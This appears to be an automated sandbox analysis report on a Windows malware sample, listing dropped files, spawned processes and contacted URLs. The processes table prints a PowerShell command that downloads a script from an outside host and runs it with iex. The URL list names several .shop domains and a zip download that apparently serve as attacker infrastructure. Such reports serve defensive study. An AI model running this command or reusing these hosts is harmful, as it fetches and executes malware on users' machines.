Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_c8e42f7fc61f7682242f1047bc22bf12abdcaff2_7d659330_dc7166e7-b95e-4e6a-bf8f-b10ee383a0db\Report.wer
|
data
|
dropped
|
 |
|
|
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE6E.tmp.dmp
|
Mini DuMP crash report, 15 streams, Thu Sep 26 15:55:58 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF88.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFB8.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tejna2j.xed.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxnpvv3h.4fy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn3cnwny.uak.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzplxn2m.qcz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pddfsfas.1ok.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0ctcdyu.5yp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 26 14:55:22 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
Chrome Cache Entry: 180
|
JSON data
|
dropped
|
||
|
Chrome Cache Entry: 181
|
ASCII text, with very long lines (524)
|
dropped
|
||
|
Chrome Cache Entry: 182
|
ASCII text, with very long lines (10127), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 183
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 540x960, components
3
|
downloaded
|
||
|
Chrome Cache Entry: 184
|
ASCII text, with very long lines (2027)
|
dropped
|
||
|
Chrome Cache Entry: 185
|
Web Open Font Format (Version 2), TrueType, length 15800, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 186
|
ASCII text, with very long lines (3521)
|
downloaded
|
||
|
Chrome Cache Entry: 187
|
ASCII text, with very long lines (768)
|
dropped
|
||
|
Chrome Cache Entry: 188
|
ASCII text
|
downloaded
|
||
|
Chrome Cache Entry: 189
|
PNG image data, 540 x 960, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 190
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 540x960, components
3
|
dropped
|
||
|
Chrome Cache Entry: 191
|
JSON data
|
downloaded
|
||
|
Chrome Cache Entry: 192
|
ASCII text, with very long lines (736)
|
dropped
|
||
|
Chrome Cache Entry: 193
|
ASCII text, with very long lines (621)
|
dropped
|
||
|
Chrome Cache Entry: 194
|
MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
downloaded
|
||
|
Chrome Cache Entry: 195
|
Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 196
|
ASCII text, with very long lines (768)
|
downloaded
|
||
|
Chrome Cache Entry: 197
|
Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 198
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 199
|
ASCII text, with very long lines (1689), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 200
|
HTML document, ASCII text, with very long lines (13378)
|
downloaded
|
||
|
Chrome Cache Entry: 201
|
MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
|
dropped
|
||
|
Chrome Cache Entry: 202
|
ASCII text, with very long lines (4998)
|
dropped
|
||
|
Chrome Cache Entry: 203
|
PNG image data, 2241 x 960, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 204
|
ASCII text, with very long lines (2134)
|
dropped
|
||
|
Chrome Cache Entry: 205
|
ASCII text, with very long lines (4232), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 206
|
PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 207
|
ASCII text, with very long lines (1885)
|
dropped
|
||
|
Chrome Cache Entry: 208
|
ASCII text, with very long lines (3521)
|
dropped
|
||
|
Chrome Cache Entry: 209
|
ASCII text, with very long lines (1518)
|
dropped
|
||
|
Chrome Cache Entry: 210
|
ASCII text, with very long lines (2682)
|
downloaded
|
||
|
Chrome Cache Entry: 211
|
ASCII text, with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 212
|
ASCII text, with very long lines (2682)
|
dropped
|
||
|
Chrome Cache Entry: 213
|
ASCII text
|
dropped
|
||
|
Chrome Cache Entry: 214
|
ASCII text, with very long lines (2134)
|
downloaded
|
||
|
Chrome Cache Entry: 215
|
ASCII text, with very long lines (593)
|
downloaded
|
||
|
Chrome Cache Entry: 216
|
RIFF (little-endian) data, Web/P image
|
downloaded
|
||
|
Chrome Cache Entry: 217
|
ASCII text, with very long lines (1885)
|
downloaded
|
||
|
Chrome Cache Entry: 218
|
HTML document, Unicode text, UTF-8 text, with very long lines (1136)
|
dropped
|
||
|
Chrome Cache Entry: 219
|
ASCII text, with very long lines (2027)
|
downloaded
|
||
|
Chrome Cache Entry: 220
|
ASCII text, with very long lines (1431)
|
downloaded
|
||
|
Chrome Cache Entry: 221
|
ASCII text, with very long lines (7408)
|
downloaded
|
||
|
Chrome Cache Entry: 222
|
ASCII text, with very long lines (593)
|
dropped
|
||
|
Chrome Cache Entry: 223
|
PNG image data, 345 x 178, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 224
|
ASCII text, with very long lines (1689), with no line terminators
|
dropped
|
||
|
Chrome Cache Entry: 225
|
ASCII text, with very long lines (1431)
|
dropped
|
||
|
Chrome Cache Entry: 226
|
ASCII text, with very long lines (2287)
|
downloaded
|
||
|
Chrome Cache Entry: 227
|
ASCII text, with very long lines (1572)
|
downloaded
|
||
|
Chrome Cache Entry: 228
|
RIFF (little-endian) data, Web/P image
|
dropped
|
||
|
Chrome Cache Entry: 229
|
ASCII text, with very long lines (1518)
|
downloaded
|
||
|
Chrome Cache Entry: 230
|
HTML document, Unicode text, UTF-8 text, with very long lines (1136)
|
dropped
|
||
|
Chrome Cache Entry: 231
|
ASCII text, with very long lines (2287)
|
dropped
|
||
|
Chrome Cache Entry: 232
|
PNG image data, 345 x 178, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 233
|
Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 234
|
HTML document, ASCII text, with very long lines (32127)
|
downloaded
|
||
|
Chrome Cache Entry: 235
|
ASCII text, with very long lines (524)
|
downloaded
|
||
|
Chrome Cache Entry: 236
|
ASCII text, with very long lines (550)
|
dropped
|
||
|
Chrome Cache Entry: 237
|
ASCII text, with very long lines (736)
|
downloaded
|
||
|
Chrome Cache Entry: 238
|
ASCII text, with very long lines (7408)
|
dropped
|
||
|
Chrome Cache Entry: 239
|
Web Open Font Format (Version 2), TrueType, length 21324, version 1.0
|
downloaded
|
||
|
Chrome Cache Entry: 240
|
PNG image data, 540 x 960, 8-bit colormap, non-interlaced
|
dropped
|
||
|
Chrome Cache Entry: 241
|
PNG image data, 2241 x 960, 8-bit colormap, non-interlaced
|
downloaded
|
||
|
Chrome Cache Entry: 242
|
ASCII text, with very long lines (621)
|
downloaded
|
||
|
Chrome Cache Entry: 243
|
ASCII text, with very long lines (550)
|
downloaded
|
||
|
Chrome Cache Entry: 244
|
ASCII text, with very long lines (4998)
|
downloaded
|
There are 74 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing;
$text = $response.Content; iex $text
|
|
|
|
C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
|
"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://google.com"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1736
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://google.com
|
|
||
|
abortinoiwiam.shop
|
|
||
|
defenddsouneuw.shop
|
|
||
|
priooozekw.shop
|
|
||
|
surroundeocw.shop
|
|
||
|
candleduseiwo.shop
|
|
||
|
racedsuitreow.shop
|
|
||
|
covvercilverow.shop
|
|
||
|
pumpkinkwquo.shop
|
|
||
|
deallyharvenw.shop
|
|
||
|
https://racedsuitreow.shop/api
|
172.67.206.221
|
|
|
|
https://finalstepgo.com/uploads/il2.txt
|
185.255.122.133
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&dt19=2&prm23=0&zx=1727366128125&opi=89978449
|
172.217.16.132
|
||
|
https://ogs.google.com/
|
unknown
|
||
|
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=1/ed=1/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl
|
172.217.16.132
|
||
|
http://www.broofa.com
|
unknown
|
||
|
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
|
172.217.16.132
|
||
|
https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA
|
172.217.16.132
|
||
|
https://ogs.google.com/widget/callout
|
unknown
|
||
|
https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1
|
172.217.16.132
|
||
|
https://www.google.com/client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449
|
172.217.16.132
|
||
|
http://www.gphysics.com
|
unknown
|
||
|
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
|
unknown
|
||
|
https://www.google.com/xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4
|
172.217.16.132
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.google.com/webhp
|
unknown
|
||
|
https://racedsuitreow.shop/u
|
unknown
|
||
|
https://www.google.com/logos/doodles/2024/popcorn/rc4/popcorn.js
|
172.217.16.132
|
||
|
https://www.google.com/gen_204?atyp=i&ei=64P1ZseiHfKwi-gPg-6IsAw&ct=slh&v=t1&im=M&m=HV&pv=0.9621399517689093&me=1:1727366123896,V,0,0,1280,907:0,B,907:0,N,1,64P1ZseiHfKwi-gPg-6IsAw:0,R,1,1,0,0,1280,907:4231,x:2883,G,1,1,395,514:2659,h,1,1,o:651,e,B&zx=1727366134321&opi=89978449
|
172.217.16.132
|
||
|
https://ogs.google.com/widget/callout?eom=1
|
unknown
|
||
|
https://www.google.com/logos/2024/popcorn/rc4/cta.png
|
172.217.16.132
|
||
|
http://crl.thawte.com/ThawtePremiumServerCA.crl0
|
unknown
|
||
|
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4
|
172.217.16.132
|
||
|
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&nt=navigate&t=fi&st=10053&fid=1&zx=1727366131013&opi=89978449
|
172.217.16.132
|
||
|
https://www.google.com/tools/feedback
|
unknown
|
||
|
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&t=all&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&adh=&cls=0.000046949291965270124&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=203802&ucb=203802&ts=204102&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&net=dl.1500,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.35,cbt.97,prt.1023,afti.1476,aft.1476,aftqf.1477,xjses.2440,xjsee.2491,xjs.2491,lcp.1481,fcp.1017,wsrt.2066,cst.677,dnst.9,rqst.730,rspt.361,sslt.677,rqstt.1697,unt.1010,cstt.1020,dit.3112&zx=1727366125369&opi=89978449
|
172.217.16.132
|
||
|
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4
|
172.217.16.132
|
||
|
https://apis.google.com/js/api.js
|
unknown
|
||
|
https://www.google.com/_/og/promos/
|
unknown
|
||
|
https://finalstepgo.com/uploads/il222.zip
|
185.255.122.133
|
||
|
https://www.google.com/logos/2024/popcorn/rc4/messages.en.nocache.json
|
172.217.16.132
|
||
|
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,aft.1476,afti.1476,cbt.97,hst.35,prt.1023&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449&ts=204102
|
172.217.16.132
|
||
|
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4
|
172.217.16.132
|
||
|
https://www.google.com/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449
|
172.217.16.132
|
||
|
https://www.thawte.com/cps0
|
unknown
|
||
|
https://www.google.com/logos/2024/popcorn/rc4/preload-sprite.png
|
172.217.16.132
|
||
|
https://www.google.com/favicon.ico
|
172.217.16.132
|
||
|
https://plus.google.com
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
https://play.google.com/log?format=json&hasfast=true
|
216.58.212.142
|
||
|
https://racedsuitreow.shop/
|
unknown
|
||
|
https://www.cybertronsoft.com
|
unknown
|
||
|
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp
|
172.217.16.132
|
||
|
https://issues.chromium.org/issues/40757070).
|
unknown
|
||
|
https://www.google.com/
|
|||
|
https://fonts.google.com/license/googlerestricted
|
unknown
|
||
|
https://racedsuitreow.shop/api9
|
unknown
|
||
|
https://clients6.google.com
|
unknown
|
||
|
https://use.typekit.net
|
unknown
|
||
|
https://csp.withgoogle.com/csp/gws/other-hp
|
142.250.184.241
|
||
|
https://www.google.com/intl/en/about/products
|
unknown
|
||
|
https://www.google.com/log?format=json&hasfast=true
|
unknown
|
||
|
https://lens.google.com
|
unknown
|
||
|
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300
|
172.217.16.132
|
||
|
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0
|
142.250.186.174
|
||
|
https://www.google.com/logos/2024/popcorn/rc4/preload-bg-sprite.jpg
|
172.217.16.132
|
||
|
http://schema.org/WebPage
|
unknown
|
||
|
https://lens.google.com/gen204
|
unknown
|
||
|
https://support.google.com/
|
unknown
|
||
|
http://www.google.com/doodles/_SHARE?description=
|
unknown
|
||
|
https://www.google.com/url?q
|
unknown
|
||
|
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
|
https://csp.withgoogle.com/csp/lcreport/
|
unknown
|
||
|
https://www.google.com/gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245,hpbarr.1030&zx=1727366129148&opi=89978449
|
172.217.16.132
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://domains.google.com/suggest/flow
|
unknown
|
||
|
https://www.google.com/logos/2024/popcorn/rc4/google_frame_mask.png
|
172.217.16.132
|
||
|
https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en
|
142.250.184.206
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ogs.google.com/widget/app/so?eom=1
|
unknown
|
||
|
https://support.google.com/websearch/answer/106230
|
unknown
|
||
|
http://ocsp.thawte.com0
|
unknown
|
||
|
https://play.google.com/log?format=json&hasfast=true&authuser=0
|
216.58.212.142
|
||
|
http://www.privacy-drive.comx
|
unknown
|
||
|
https://www.google.com/client_204?cs=1&opi=89978449
|
172.217.16.132
|
||
|
https://www.google.com/gen_204?atyp=csi&ei=8YP1Zq3GL5iK9u8P68momQ0&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&hp=&rt=ttfb.1024,st.1025,bs.27,aaft.1026,acrt.1026,art.1027&zx=1727366129148&opi=89978449
|
172.217.16.132
|
||
|
https://google.com/
|
142.250.181.238
|
||
|
https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
|
unknown
|
||
|
https://www.google.com/xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy